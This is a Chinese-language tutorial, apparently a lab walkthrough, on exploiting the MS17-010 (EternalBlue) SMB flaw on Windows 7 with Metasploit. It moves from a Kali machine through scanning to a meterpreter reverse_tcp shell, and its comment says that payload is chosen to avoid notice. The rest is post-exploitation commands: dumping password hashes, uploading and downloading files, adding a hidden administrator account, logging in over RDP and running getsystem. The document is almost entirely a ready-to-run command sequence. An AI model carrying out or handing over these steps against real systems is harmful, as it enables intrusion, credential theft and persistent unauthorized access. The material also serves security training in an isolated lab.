MS17_010漏洞(永恒之蓝)
一、概述
1、官方描述:https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-
010
2、漏洞描述:Microsoft Windows SMB Server远程代码执行漏洞。
3、影响范围:对windows7和windows server 2008等大部分版本的操作系统。
二、实战
1、实验环境
攻击机kali(2021):192.168.200.104
靶机win7:192.168.200.105
注:查看靶机是否存活,可以配合nmap使用
2、操作
(1)、kali启动metasploit测试平台
命令:msfconsole
(2)、搜索kali中有没有ms17_010漏洞模块
命令:search ms17_010
结果发现有的
(3)、使用auxiliary/scanner/smb/smb_ms17_010即辅助扫描模块,扫描靶机是否存在ms-17-010漏洞
命令1:use 3 #使用模块
注:use后面可以写id值或name值。
命令2:show options #查看所使用的模块需要配置的参数
发现还需要填写RHOSTS的参数
命令3:set rhosts 192.168.200.105 #设置目标主机为靶机
命令4:run或exploit #yunxing
发现靶机似乎存在该漏洞
(4)、使用exploit/windows/smb/ms17_010_eternalblue即漏洞利用模块,攻击靶机
命令1:use 0
命令2:show options
命令3:set rhosts 192.168.200.105
注:有点可能还需要设置攻击机(本地)ip地址
命令4:set payload windows/x64/meterpreter/reverse_tcp #设置攻击载荷,使它不易发现
命令5:run
3、对靶机进行操作,命令如下
查看目标靶机信息:sysinfo
获取屏幕快照:screenshot
上传文件:upload /home/kali/Desktop/dict/IP.txt c:\\set
下载文件:download 靶机filedir 攻击机filedir
4、提权(后渗透利用)
(1)、查看权限:Windows命令为:getuid
Linux命令为:whoami
注:如果已是管理员用户,输入hashdump,再解密
(2)、进入shell,添加用户
命令:net user 用户 密码 /add
(3)、把刚刚创建好的用户添加到管理员组,提升为管理员
命令:net localgroup administrators 用户 /add
(4)、远程登录刚建好的用户
命令:rdesktop 192.168.200.105
四、补充,攻击成功进入meterpreter后,常用命令
将当前会话隐藏在后台:background
打开终端:shell
出现乱码:chcp 65001
查看在活动中的会话:sessions
在目标机上执行文件:execute
获取目标系统上当前的工作目录:getwd
获取系统最高用户的权限:getsystem